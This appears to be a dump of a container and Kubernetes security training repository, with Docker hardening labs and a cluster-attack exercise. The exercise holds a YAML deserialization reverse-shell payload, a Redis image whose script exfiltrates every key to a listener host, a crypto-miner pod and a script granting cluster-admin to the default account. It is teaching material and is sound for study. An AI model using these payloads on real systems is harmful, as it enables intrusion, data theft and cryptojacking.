-------------------------------------------------------------------------------- /Container/extra/container/Container-Orchestrators/Docker-Compose/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | helloworld: 4 | image: helloworld:latest 5 | expose: 6 | - "5000" 7 | nginx: 8 | image: nginx:latest 9 | ports: 10 | - "80:80" 11 | volumes: 12 | - ./conf.d:/etc/nginx/conf.d 13 | depends_on: 14 | - helloworld 15 | -------------------------------------------------------------------------------- /Container/extra/container/Container-Orchestrators/Docker-Compose/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Container-Orchestrators/Docker-Compose/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Container-Orchestrators/Docker-Compose/img/app-status.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Container-Orchestrators/Docker-Compose/img/app-status.png -------------------------------------------------------------------------------- /Container/extra/container/Container-Orchestrators/README.md: -------------------------------------------------------------------------------- 1 | # [Container Orchestrators](README.me) 2 | 3 | 4 | * ##### [Docker Compose](Docker-Compose/README.md) 5 | -------------------------------------------------------------------------------- /Container/extra/container/Dagda/img/Open-Terminal.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Dagda/img/cd-path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/cd-path.png -------------------------------------------------------------------------------- /Container/extra/container/Dagda/img/dagda-db.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/dagda-db.png -------------------------------------------------------------------------------- /Container/extra/container/Dagda/img/env1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/env1.png -------------------------------------------------------------------------------- /Container/extra/container/Dagda/img/env2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/env2.png -------------------------------------------------------------------------------- /Container/extra/container/Denial-of-Service/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Denial-of-Service/img/Open-Terminal.png 
-------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/docker-exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-exec.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/docker-ps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-ps.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/docker-rm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-rm.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/docker-run.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-run.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Daemon-Direct-Access/img/docker-stop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-stop.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/README.md: -------------------------------------------------------------------------------- 1 | ## Auditd for Docker monitoring 2 | 3 | 4 | #####Step 1: 5 | * Run `service auditd status` to check if the `auditd` service is running. If the service is not running, run `service auditd start`. 6 | 7 | 8 | ![](img/auditd-1.png) 9 | 10 | 11 | #####Step 2: 12 | * Create an audit rule that watches for Read, Write, Execute and Attribute changes on `/usr/bin/docker` and tags each resulting log entry with the 13 | `docker-daemon` key, which makes the logs easier to query. This can be done by running: 14 | 15 | `auditctl -w /usr/bin/docker -p rwxa -k docker-daemon` 16 | 17 | * Rules added with `auditctl` are temporary and are lost when the system shuts down. For a persistent rule, add it to a file under `rules.d/` and run `augenrules --check`. 18 | If it reports a difference, run `augenrules --load` to load the new rules. 19 | 20 | 21 | ![](img/auditd-2.png) 22 | 23 | 24 | #####Step 3: 25 | * Create, Launch, Run and Stop a few containers for Auditd to log. 26 | 27 | ![](img/auditd-3.png) 28 | 29 | 30 | #####Step 4: 31 | * To search the logs by the key given above (`docker-daemon`), run `ausearch -k docker-daemon`. 
32 | 33 | ![](img/auditd-4.png) 34 | 35 | 36 | #####Step 5: 37 | * For a count of executable events run on system that day, run `ausearch --start today --raw | aureport -x --summary` 38 | 39 | ![](img/auditd-5.png) 40 | -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/img/auditd-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-1.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/img/auditd-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-2.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/img/auditd-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-3.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/img/auditd-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-4.png -------------------------------------------------------------------------------- /Container/extra/container/Docker-Monitoring/img/auditd-5.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-5.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-1.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-2.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-3.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-4.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-5.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-6.png -------------------------------------------------------------------------------- /Container/extra/container/Network-Namespace/img/netns-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-7.png -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/README.md: -------------------------------------------------------------------------------- 1 | # Union Mount FileSystem 2 | 3 | --- 4 | 5 | ## Please Note: This might not work on VM 6 | 7 | 8 | #### Step 1: Create Three Folders named `Folder-1`, `Folder-2` and `mnt` 9 | 10 | mkdir Folder-1 Folder-2 mnt 11 | 12 | ![](img/ufs-1.png) 13 | 14 | 15 | #### Step 2: Create sub-directories and files in `Folder-1` and `Folder-2` 16 | 17 | mkdir -p Folder-1/Dir1 Folder-2/Dir1 Folder-2/Dir2 18 | 19 | touch Folder-1/File1.txt Folder-1/Dir1/dir1.txt 
Folder-1/Dir1/one.txt 20 | 21 | touch Folder-2/Dir1/file2.txt Folder-2/Dir1/two.txt Folder-2/Dir2/dir2_file.txt Folder-2/File2.txt 22 | 23 | ![](img/ufs-2.png) 24 | 25 | 26 | #### Step 3: Check the structure of directories that have been created 27 | 28 | tree . 29 | 30 | ![](img/ufs-3.png) 31 | 32 | 33 | #### Step 4: Run `unionfs-fuse -o dirs=Folder-1:Folder-2 mnt/` . The directories and files in `Folder-1` and `Folder-2` will be mounted on `mnt` 34 | 35 | unionfs-fuse -o dirs=Folder-1:Folder-2 mnt/ 36 | 37 | ![](img/ufs-4.png) 38 | 39 | 40 | #### Step 5: Check the structure of `mnt/` 41 | 42 | tree mnt 43 | 44 | ![](img/ufs-5.png) 45 | 46 | 47 | #### Step 6: To unmount, run `umount -l mnt` 48 | 49 | umount -l mnt 50 | 51 | ![](img/ufs-6.png) 52 | 53 | -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-1.png -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-2.png -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-3.png 
-------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-4.png -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-5.png -------------------------------------------------------------------------------- /Container/extra/container/Union-Mount-File-System/img/ufs-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-6.png -------------------------------------------------------------------------------- /Container/extra/container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Vulnerable-Libraries-ShellShock/img/defaced.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/defaced.png -------------------------------------------------------------------------------- /Container/extra/container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png -------------------------------------------------------------------------------- /Container/extra/container/dlayer/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/dlayer/img/dlayer-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/dlayer-1.png -------------------------------------------------------------------------------- /Container/extra/container/dlayer/img/dlayer-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/dlayer-2.png -------------------------------------------------------------------------------- /Container/extra/container/dlayer/img/docker-images-list.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/docker-images-list.png -------------------------------------------------------------------------------- /Container/seccomp/README.md: -------------------------------------------------------------------------------- 1 | ## SECCOMP Profiles for Docker Containers 2 | 3 | * `cd` into the directory that contains `custom_profile.json` 4 | 5 | * Run `docker run -it --rm --security-opt seccomp:custom_profile.json alpine chmod 400 /etc/hostname` 6 | 7 | * Observe the results: the `chmod` call is denied, because the profile answers the `chmod`, `chown` and `chown32` syscalls with an error (`SCMP_ACT_ERRNO`) while allowing everything else -------------------------------------------------------------------------------- /Container/seccomp/custom_profile.json: -------------------------------------------------------------------------------- 1 | { 2 | "defaultAction": "SCMP_ACT_ALLOW", 3 | "architectures": [ 4 | "SCMP_ARCH_X86_64", 5 | "SCMP_ARCH_X86", 6 | "SCMP_ARCH_X32" 7 | ], 8 | "syscalls": [ 9 | { 10 | "name": "chmod", 11 | "action": "SCMP_ACT_ERRNO", 12 | "args": [] 13 | }, 14 | { 15 | "name": "chown", 16 | "action": "SCMP_ACT_ERRNO", 17 | "args": [] 18 | }, 19 | { 20 | "name": "chown32", 21 | "action": "SCMP_ACT_ERRNO", 22 | "args": [] 23 | } 24 | 25 | ] 26 | } -------------------------------------------------------------------------------- /Kubernetes/Initial-Setup/README.md: -------------------------------------------------------------------------------- 1 | # Steps to run before starting Labs 2 | 3 | ##### Step 1: 4 | 5 | * Update the Labs 6 | 7 | ```bash 8 | cd /root/container_training/ 9 | 10 | git pull 11 | ``` 12 | -------------------------------------------------------------------------------- /Kubernetes/Initial-Setup/install_script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "This is for ubuntu:16.04(Xenial). Run as root user!" 
4 | apt update && apt -y upgrade 5 | apt install -y curl wget apt-transport-https docker.io unzip httpie openssl golang-go jq htop 6 | curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add - 7 | echo "deb http://apt.kubernetes.io/ kubernetes-xenial main" >> /etc/apt/sources.list.d/kubernetes.list 8 | apt update && apt install -y kubelet=1.10.3-00 kubeadm=1.10.3-00 kubectl=1.10.3-00 kubernetes-cni 9 | wget https://bootstrap.pypa.io/get-pip.py && python get-pip.py && rm get-pip.py && pip install netaddr netifaces enum34 scapy requests PrettyTable urllib3 ruamel.yaml tornado 10 | git clone https://github.com/we45/container_training.git 11 | wget https://releases.hashicorp.com/vault/1.0.1/vault_1.0.1_linux_amd64.zip && unzip vault_1.0.1_linux_amd64.zip && mv vault /usr/local/bin && rm vault_1.0.1_linux_amd64.zip 12 | wget -O /usr/local/bin/kubeseal https://github.com/bitnami-labs/sealed-secrets/releases/download/v0.7.0/kubeseal-linux-amd64 && chmod +x /usr/local/bin/kubeseal 13 | echo "curl -XGET https://www.canihazip.com/s" >> /usr/local/bin/serverip && echo "echo ''" >> /usr/local/bin/serverip && chmod +x /usr/local/bin/serverip 14 | -------------------------------------------------------------------------------- /Kubernetes/Istio/README.md: -------------------------------------------------------------------------------- 1 | # Istio for Network Security Policies 2 | 3 | ## Objective 4 | 5 | * In the K8s Attack exercises, the RCE could have been prevented if the `reverse shell` had been blocked by network security controls 6 | 7 | * Istio blocks `egress` traffic by default. 
8 | 9 | ##### Step 1: 10 | 11 | * Navigate to the istio directory 12 | 13 | ```commandline 14 | cd /root/container_training/Kubernetes/Istio 15 | ``` 16 | 17 | * Download the installation file 18 | 19 | ``` 20 | curl -L https://git.io/getLatestIstio | sh - 21 | ``` 22 | 23 | * Navigate to the installation directory 24 | 25 | ``` 26 | ls 27 | 28 | cd istio-1.x.x 29 | ``` 30 | 31 | ##### Step 2: 32 | 33 | * Install Istio without mutual TLS authentication between sidecars 34 | 35 | ``` 36 | kubectl apply -f install/kubernetes/istio-demo.yaml 37 | ``` 38 | 39 | * Verify the installation 40 | 41 | ``` 42 | kubectl get svc -n istio-system 43 | 44 | kubectl get pods -n istio-system 45 | ``` 46 | 47 | ##### Step 3: 48 | 49 | * Apply automatic sidecar injection to the `default` namespace 50 | 51 | ``` 52 | kubectl label namespace default istio-injection=enabled 53 | ``` 54 | 55 | ##### Step 4: 56 | 57 | * Navigate to `K8s-Cluster-Attack` and try to run the exercise again 58 | 59 | * Observe the results 60 | 61 | 62 | ##### Step 5: 63 | 64 | * Stop istio 65 | 66 | ``` 67 | kubectl delete -f install/kubernetes/istio-demo.yaml 68 | 69 | kubectl label namespace default istio-injection- 70 | ``` 71 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/K8s-Cluster-Attack/__init__.py -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/malicious-redis/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM redis:alpine 2 | 3 | ENV CLIENTPORT 6379 4 | ENV MASTERPORT 6379 5 | ENV MASTERHOST 192.168.122.1 6 | ENV CLIENTHOST 0.0.0.0 7 | ENV APPENDFSYNC=everysec 8 | ENV LISTENER_IP 192.168.122.1 9 | ENV LISTENER_PORT 9080 
10 | 11 | ADD redis.conf /etc/redis.conf 12 | RUN chown redis:redis /etc/redis.conf 13 | RUN apk add curl 14 | COPY post_db.sh / 15 | RUN chmod +x /post_db.sh 16 | EXPOSE $CLIENTPORT 17 | 18 | ADD docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh 19 | ENTRYPOINT ["docker-entrypoint.sh"] 20 | 21 | CMD [ "redis-server","/etc/redis.conf" ] 22 | 23 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/malicious-redis/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -ex 3 | 4 | ## from redis-3.2 5 | sed -i "s/bind 127.0.0.1/bind $CLIENTHOST/g" /etc/redis.conf 6 | 7 | ## redis port inside redis.conf 8 | sed -i "s/port 6379/port $CLIENTPORT/g" /etc/redis.conf 9 | # sed -i "s/# requirepass foobared/requirepass $REQUIREPASS/g" /etc/redis.conf 10 | # sed -i "s/# masterauth /masterauth $REQUIREPASS/g" /etc/redis.conf 11 | 12 | ## slaveof => slaveof $MASTERHOST $MASTERPORT 13 | if [ "$MASTERPORT" != "" ];then 14 | sed -i "s/# slaveof /slaveof $MASTERHOST $MASTERPORT/g" /etc/redis.conf 15 | fi 16 | 17 | ## appendfsync everysec => appendfsync $APPENDFSYNC 18 | if [ "$APPENDFSYNC" != "" ];then 19 | sed -i "s/appendonly no/appendonly yes/g" /etc/redis.conf 20 | sed -i "s/appendfsync everysec/appendfsync $APPENDFSYNC/g" /etc/redis.conf 21 | fi 22 | 23 | 24 | # first arg is `-f` or `--some-option` 25 | # or first arg is `something.conf` 26 | if [ "${1#-}" != "$1" ] || [ "${1%.conf}" != "$1" ]; then 27 | set -- redis-server "$@" 28 | fi 29 | 30 | # allow the container to be started with `--user` 31 | if [ "$1" = 'redis-server' -a "$(id -u)" = '0' ]; then 32 | nohup /post_db.sh > /dev/null 2>&1 & 33 | chown -R redis . 
34 | exec su-exec redis "$@" 35 | fi 36 | 37 | exec "$@" 38 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/malicious-redis/post_db.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while :; do 3 | sleep 10 4 | for each in $( redis-cli KEYS \* ); do 5 | result=$(redis-cli type $each) 6 | value="" 7 | if [ $result == "list" ] 8 | then 9 | value=$(redis-cli lrange $each 0 -1) 10 | elif [ $result == "string" ] 11 | then 12 | value=$(redis-cli get $each) 13 | elif [ $result == "set" ] 14 | then 15 | value=$(redis-cli smembers $each) 16 | fi 17 | curl -X POST -H "Content-Type: application/json; charset=UTF-8" -d "{\"key\": \"$each\", \"value\": \"$value\"}" http://$LISTENER_IP:$LISTENER_PORT 18 | sleep 1 19 | done 20 | sleep 10 21 | done 22 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/malicious_pods/cminer.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Pod", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "cmine" 6 | }, 7 | "spec": { 8 | "containers": [{ 9 | "name": "cmine", 10 | "image": "tseabra/coin-hive", 11 | "command": ["./coin-hive","Ipf5vWwTX3gO6jd00mm1Wrg3SmNkLk0k"] 12 | }] 13 | } 14 | } -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Pod", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "mal-redis" 6 | }, 7 | "spec": { 8 | "containers": [{ 9 | "name": "mal-redis", 10 | "image": "we45/malicious-redis-slave", 11 | "env": [ 12 | { 13 | "name": "MASTERHOST", 14 | "value": "127.0.0.1" 15 | }, 16 | { 17 | "name": "MASTERPORT", 18 | "value": "6379" 19 | }, 20 | { 21 | "name": "LISTENER_IP", 22 | "value": 
"192.168.1.5" 23 | }, 24 | { 25 | "name": "LISTENER_PORT", 26 | "value": "3999" 27 | } 28 | ] 29 | }] 30 | } 31 | } -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/ngflask-redis-service.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngflask-redis-service 5 | spec: 6 | ports: 7 | - port: 80 8 | protocol: TCP 9 | selector: 10 | app: ngflask-redis 11 | type: ClusterIP -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/ngflaskredis-deployment.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: ngflask-redis 5 | labels: 6 | app: ngflask-redis 7 | spec: 8 | containers: 9 | - name: nginx 10 | image: nginx:1.11 11 | ports: 12 | - containerPort: 80 13 | volumeMounts: 14 | - mountPath: /etc/nginx/conf.d 15 | name: config-volume 16 | - name: redis 17 | image: redis 18 | ports: 19 | - containerPort: 6379 20 | - name: vulflask-redis 21 | image: abhaybhargav/vul_flask_redis 22 | imagePullPolicy: Always 23 | env: 24 | - name: REDIS_HOST 25 | value: 127.0.0.1 26 | ports: 27 | - containerPort: 5000 28 | name: vulflask-port 29 | volumes: 30 | - name: config-volume 31 | configMap: 32 | name: nginx-config 33 | items: 34 | - key: reverseproxy.conf 35 | path: reverseproxy.conf 36 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/payloads/reverse_shell.yml: -------------------------------------------------------------------------------- 1 | name: PayTM Bill payment 3 2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"Server_IP_Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"] 3 | merchant: Hello World Traders 4 | amount: 12 5 | card: 4111111111111111 -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/payloads/test_payment.yml: -------------------------------------------------------------------------------- 1 | name: PayTM Bill payment 5 2 | reason: !!python/object/apply:subprocess.check_output ["printenv"] 3 | merchant: Hello World Traders 4 | amount: 112 5 | card: 5111111111111111 -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/redis-service.yml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: redis-service 5 | spec: 6 | ports: 7 | - port: 6379 8 | protocol: TCP 9 | selector: 10 | app: ngflask-redis 11 | type: NodePort -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/reverseproxy.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | 5 | location / { 6 | proxy_bind 127.0.0.1; 7 | proxy_pass http://127.0.0.1:5000; 8 | } 9 | 10 | error_page 500 502 503 504 /50x.html; 11 | location = /50x.html { 12 | root /usr/share/nginx/html; 13 | } 14 | } -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/setup_flask_stack.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | kubectl create configmap nginx-config --from-file=reverseproxy.conf 3 | echo "Deploying Vul Flask Nginx Pod" 4 | kubectl create -f ngflaskredis-deployment.yml 5 | sleep 5 6 | echo "Deploying Vul-Flask-Nginx Service" 7 | kubectl create -f ngflask-redis-service.yml 8 | kubectl create -f 
redis-service.yml -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/setup_insecure_kube.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | kubeadm init --pod-network-cidr=10.244.0.0/16 --apiserver-advertise-address $(curl -XGET https://www.canihazip.com/s) 4 | mkdir -p $HOME/.kube 5 | cp /etc/kubernetes/admin.conf $HOME/.kube/config 6 | chown $(id -u):$(id -g) $HOME/.kube/config 7 | kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml 8 | kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/k8s-manifests/kube-flannel-rbac.yml 9 | kubectl taint nodes --all node-role.kubernetes.io/master- 10 | sleep 5 11 | kubectl create clusterrolebinding badboy --clusterrole cluster-admin --serviceaccount=default:default 12 | echo "kubernetes initialized in insecure mode..." 13 | -------------------------------------------------------------------------------- /Kubernetes/K8s-Cluster-Attack/tornado_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import tornado.ioloop 4 | import tornado.web 5 | import pprint 6 | 7 | 8 | class MyDumpHandler(tornado.web.RequestHandler): 9 | def post(self): 10 | pprint.pprint(self.request) 11 | pprint.pprint(self.request.body) 12 | 13 | if __name__ == "__main__": 14 | tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090) 15 | tornado.ioloop.IOLoop.instance().start() 16 | 17 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/README.md: -------------------------------------------------------------------------------- 1 | # K8s CIS Benchmark - Kube-bench 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Navigate to the `Kube-Bench` directory 7 | 8 | ```bash 9 | cd /root/container_training/Kubernetes/Kube-Bench 10 | ``` 
11 | 12 | 13 | ##### Step 2: 14 | 15 | * To get a list of available commands and options, run the following command 16 | 17 | ```bash 18 | ./kube-bench --help 19 | ``` 20 | 21 | 22 | ##### Step 3: 23 | 24 | * To run CIS benchmark scan, run 25 | 26 | ```bash 27 | ./kube-bench master 28 | ``` 29 | 30 | 31 | ##### Step 4: 32 | 33 | * To save results to a `json` file, run the following command 34 | 35 | If a `.json` report is necessary, run 36 | 37 | ```bash 38 | ./kube-bench --json master > report.json 39 | ``` 40 | -------------------------------------------------------------------------------- /Kubernetes/Kube-Bench/cfg/1.8/config.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | ## Controls Files. 3 | # These are YAML files that hold all the details for running checks. 4 | # 5 | ## Uncomment to use different control file paths. 6 | # masterControls: ./cfg/master.yaml 7 | # nodeControls: ./cfg/node.yaml 8 | # federatedControls: ./cfg/federated.yaml 9 | 10 | master: 11 | apiserver: 12 | confs: 13 | - /etc/kubernetes/manifests/kube-apiserver.yaml 14 | - /etc/kubernetes/manifests/kube-apiserver.manifest 15 | defaultconf: /etc/kubernetes/manifests/kube-apiserver.yaml 16 | 17 | scheduler: 18 | confs: 19 | - /etc/kubernetes/manifests/kube-scheduler.yaml 20 